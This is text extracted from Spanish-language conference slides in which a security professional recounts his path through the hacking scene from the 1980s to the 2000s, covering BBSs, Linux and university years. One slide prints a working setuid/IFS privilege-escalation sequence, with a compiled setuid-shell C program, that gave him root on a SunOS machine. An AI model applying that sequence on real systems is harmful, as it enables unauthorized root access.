PDF de programación - Mundo hacking UPM TASSI 2013

Mundo hacking
UPM TASSI 2013

Román Ramírez Giménez
<[email protected]>
@patowc

1

IX Ciclo de Conferencias UPM TASSI 2013

Quién soy


Responsable de Seguridad en
Arquitecturas, Sistemas y Servicios de
Ferrovial.
Coorganizador de RootedCON.
Hacker.


IX Ciclo de Conferencias UPM TASSI 2013

2

¿De qué trata esta charla?


El Mundo del Hacking: a través de mis ojos.
Mis últimos veinte años: desde 1992/1993
hasta ahora.
Una opinión particular y personal sobre
qué es hacking y qué es el mundo del
hacking.


IX Ciclo de Conferencias UPM TASSI 2013

3

Antecedentes

Cult of Dead Cow, 1984
Phrack Magazine, 1985
The Mentor, LoD, Loyd Blankenship, 08/01/1986.
Manual del novicio hacker, Ender Wiggins, 1987.
HoHoCon: Drunkfux, Jesse Dryden, 1990.
Operación Sundevil, 1990.
“The Hacker Crackdown”, Bruce Sterling.
Operación Millenium, 2000.

IX Ciclo de Conferencias UPM TASSI 2013

4

The Conscience of a Hacker
http://www.phrack.org/issues.html?issue=7&id=3

“Yes, I am a criminal. My crime is that of
curiosity. My crime is that of judging
people by what they say and think, not what
they look like.
My crime is that of outsmarting you,
something that you will never forgive me for.
I am a hacker, and this is my manifesto. You
may stop this individual, but you can't stop
us all... after all, we're all alike.


+++The Mentor+++”



IX Ciclo de Conferencias UPM TASSI 2013

5

Primeros pasos

IX Ciclo de Conferencias UPM TASSI 2013

6

Primeros pasos

1987

ZX81: no puede sacarle partido.
Spectrum+ 48k: Juegos, BASIC,
Ensamblador z80, Transtape, Cintas de
video, ¡LOS POKES!
Parada durante algunos años: jugando a
rol…
Cyrix 486SLC, de palo (entre 386/486 “on
steroids” + copro): primera pardillada.

IX Ciclo de Conferencias UPM TASSI 2013

7

IX Ciclo de Conferencias UPM TASSI 2013

8

Primeros pasos (ii): hackers

Glaucoma: ZARAGOZA 
http://hackstory.net/Glaucoma

Oficialmente desde 1987 a 1989
Posteriormente Apòstols…

1987

IX Ciclo de Conferencias UPM TASSI 2013

9

Primeros pasos: segunda etapa

Ya con el PC (recordad, el Cirix)
MS-DOS y Win 3.1
Programación: ¿BASIC?
El BARROTES: segunda pardillada…


1993

IX Ciclo de Conferencias UPM TASSI 2013

10

Segunda etapa: hackers

Apòstols: “joshua!” ;)

http://hackstory.net/Apòstols

Oficialmente desde 1989 a - ¿?

1989

IX Ciclo de Conferencias UPM TASSI 2013

11

Segundos pasos

IX Ciclo de Conferencias UPM TASSI 2013

12

Segundos pasos

x;
y;
z;

C++: quería hacer cosas más elaboradas...
class Punto {
intfloat

intfloat

intfloat

}
Turbo C, Borland C/C++ 3.1, DJGPP,
Watcom DOS/4GW ¡32bits! ¡Y modo
protegido!


IX Ciclo de Conferencias UPM TASSI 2013

13

IX Ciclo de Conferencias UPM TASSI 2013

14

Segundos pasos (ii)


Y descubrí las BBS: Public NME, The Light,
encomIX, EUTIZ, Parser BBS, El Sol BBS,
Movera, Chessnia BBS (Zaragoza), +BYTES
(Pamplona), Edison BBS (en Madrid), …
FidoNET, Subnet, RedBBS, LibreNET…
Bluewave, Frontdoor, Remote Access…
Public NME BBS: 2:342/1
1993

IX Ciclo de Conferencias UPM TASSI 2013

15

Segundos pasos: patowc


A punto de entrar en “El Mundo” (el de
verdad, BBS, Internet, …) necesitaba un
alias (todo el mundo lo tenía).
La gente se toma demasiado en serio a sí
misma… Medité:

“¿Cómo recordarme siempre que no debo
tomarme demasiado en serio a mí mismo?”

IX Ciclo de Conferencias UPM TASSI 2013

16

Segundos pasos: patowc


¿He dicho que jugaba a rol? Retomé un
personaje de RuneQuest y escogí un
nombre lo más ridículo posible: patowc.
Pero también tenía otros aliases,… ROT
(Roger O. Thornhill), “El gato” (John Robie),
MB (Mortimer Brewster), Eldritch, Overload,
RO/RW, Jano…
Pero siempre: patowc.

17

IX Ciclo de Conferencias UPM TASSI 2013



Segundos pasos (iii): más hackers


Public NME BBS: 2:342/1 antigua Scroll
Lock BBS…
Scroll Lock BBS herencia de Bauhaus...
Bauhaus la montaron Depeche Mode y Han
Solo (glaucoma)…
Public NME la montó Depeche Mode (Michel
Izquierdo)…

IX Ciclo de Conferencias UPM TASSI 2013

18

Segundos pasos (iv): más hackers


Depeche Mode y Han Solo comenzaron
crackeando videojuegos (Super Rata
Software y AWD).
Posteriormente pasaron al hacking…
Gente que conocí en esa época en el
mundillo de las BBS…


IX Ciclo de Conferencias UPM TASSI 2013

19

Segundos pasos (v): más hackers


Recuerdo especialmente una noche que
estaba conectado a Public NME que, Michel
Izquierdo, “El SysOp” (dios) me abrió una
conversación y me dijo:



“¿Tú programas?”

Con el tiempo, pude responder sí, fui
cosysop de NME, “kdds”, “los huevos”…


IX Ciclo de Conferencias UPM TASSI 2013

20

Segundos pasos (vi): más hackers


Y otra noche, que conectado a encomIX BBS
quedé con rampa y me fui a visitarle a las
oficinas de “Diario 16”.
Mis primeras direcciones de correo-e:

[email protected]
[email protected]

(me “rutaba” los correos Ramón a mano)


IX Ciclo de Conferencias UPM TASSI 2013

21

Segundos pasos (vii): más hackers


encomIX, que se llamaba originalmente
encom (Tron).
Waffle BBS: traduje el manual a español
(todavía guardo una copia impresa).
Y, finalmente, terminé trabajando en
encomIX, el ISP…


IX Ciclo de Conferencias UPM TASSI 2013

22

IX Ciclo de Conferencias UPM TASSI 2013

23

Segundos pasos (y viii)

1993

iGUANA: demoscene, David Tolosana, Noisyman
(http://modarchive.org/index.php?request=view_by_
moduleid&query=69751)
Radioaficionados: EB/EA, el zorro, packetradio…
LINUX: slackware y kernel 0.97
Mi primera BBS: Remote Access
DESQview/X
OS/2 Warp: el único sistema operativo que he
comprado nunca.


1993/1994

IX Ciclo de Conferencias UPM TASSI 2013

1994/1995

24

slackware

IX Ciclo de Conferencias UPM TASSI 2013

25

slackware


Cansado de problemas y tras la frustración
con Barrotes sentía que “tenía que haber
algo más”.
Conocí linux a través de un amigo de la
Universidad de Zaragoza.
Mi primer contacto fue una caja de
disquetes con 52 discos de tres y medio

IX Ciclo de Conferencias UPM TASSI 2013

26

slackware (ii)


Nunca se me olvidará la instalación (de la
serie “N” no me funcionaba ningún disco).
Ni el prompt tras el arranque:


IX Ciclo de Conferencias UPM TASSI 2013

27

slackware (iii)


En esta etapa aprendí cosas como
UNIX/Linux, “vi”, libc, sockets…
“UNIX Network Programming” y
“Advanced Programming in the UNIX
environment”, W. Richard Stevens
“The C Programming Language”, Brian
Kernighan y Dennis Ritchie.


IX Ciclo de Conferencias UPM TASSI 2013

28

slackware (iv): hackers

1996/1997

Por estas fechas…
JJF Hackers, La Vieja Guardia (el famoso
OOB de Billsucks), Revista SET…
Operación Toco: Universidad Rovira i Virgili
y un par de estudiantes “rebeldes”.
Operación Tornado: Warez de Barcelona y
Tenerife…
Primera Undercon: ¡Murcia!

1997

IX Ciclo de Conferencias UPM TASSI 2013

29

slackware (v): hackers

“Manual del novicio hacker”, por Ender
Wiggins (que luego descubrí que era rampa)
sunsniff.c: me “pidieron” desde la
Universidad que lo borrara de la BBS. Ni
hablar.
Conocí “strobe”: Julian Assange, 1995. Mi
primer portscanner…
Anselmo del Moral y las FCSE…


30

IX Ciclo de Conferencias UPM TASSI 2013

slackware (y vi)


Etapa tranquila centrado en aprender a
programar bien, entender los sistemas
operativos…
Mi única actividad “dudosa” se relacionaba
con el “trading” y el “warez”.
20 de mayo de 1997: Black Wraith.


1997

IX Ciclo de Conferencias UPM TASSI 2013

31

La universidad

IX Ciclo de Conferencias UPM TASSI 2013

32

La universidad


Durante el proceso anterior, comencé a
estudiar Ingeniería Informática de Sistemas.
Mi objetivo era: aprender un montón, todo lo
que no sabía…
Mi decepción fue tremenda. De tal calibre
que, durante muchos años, directamente no
quise volver a saber nada del mundo
académico.

IX Ciclo de Conferencias UPM TASSI 2013

33

La universidad (ii)


Muestra: Pascal, modula-2, Oberon… y
llevaba ya bastante tiempo programando en
C/C++… (WTF?)
Muestra: Internet una red en árbol ¿? ¿?
Tras los años me di cuenta de que el único
responsable de no encajar era yo, y lo
retomé ya con ganas.

IX Ciclo de Conferencias UPM TASSI 2013

34

La universidad (iii)


Pero saqué cosas muy interesantes 
Mi primer hack:
– Script sonido_acceso.sh con bit setuid. Este script

ejecutaba algo como “cat sonido.aiff
/dev/dispositivosonido” (SunOS)

– root.
– ¿Mi error? Abrir la bocaza. Me suspendieron la cuenta

(tenía como otras setecientas).

– Pero me nadie me pudo quitar la sonrisa de la boca (la

sigo teniendo ).



IX Ciclo de Conferencias UPM TASSI 2013

35

La universidad (iii bis): el proceso
~$ ln –s /usr/bin/sonido_acceso.sh

sonidoacceso

~$ cp /bin/sh sh
~$ cat usr.c
#include … int main(){setuid(0); setgid(0);

seteuid(0); setegid(0);system(“sh”); return
0; }

~$ cc –o usr usr.c
~$ export IFS=/ && export PATH=.:$PATH
~$ ./sonidoacceso
~#

IX Ciclo de Conferencias UPM TASSI 2013

36

La universidad (iv)


Amigos. Contactos. Relaciones.
Kobalt of Nod, Eldritch of Nod, JCD, Black
Wraith, Sergio DJ, Marcus Kowalski, Rmur,
Davmac, Noisyman, chapulin…
LIA01: la “puta” ;)
Uniovi: la otra “puta”, cómo vi más adelante
“Línea piloto”

37

IX Ciclo de Conferencias UPM TASSI 2013



La universidad (v)


Nuestro segundo hack:
– La idea no fue mía.
– Red Novell (creo) y editores de texto en MSDOS.
– Prácticas de asignaturas: los documentos de los

alumnos se almacenaban en carpetas de red.

– Cuando ocurrían errores, los ficheros de bloqueaban. El

administrador de la sala, los desbloqueaba.

– Un genio: copiaba un programa de desbloqueo en el

disco local y luego, “liberaba” el fichero con problemas.

– UNDELETE… y modificar la configuración de la red.

IX Ciclo d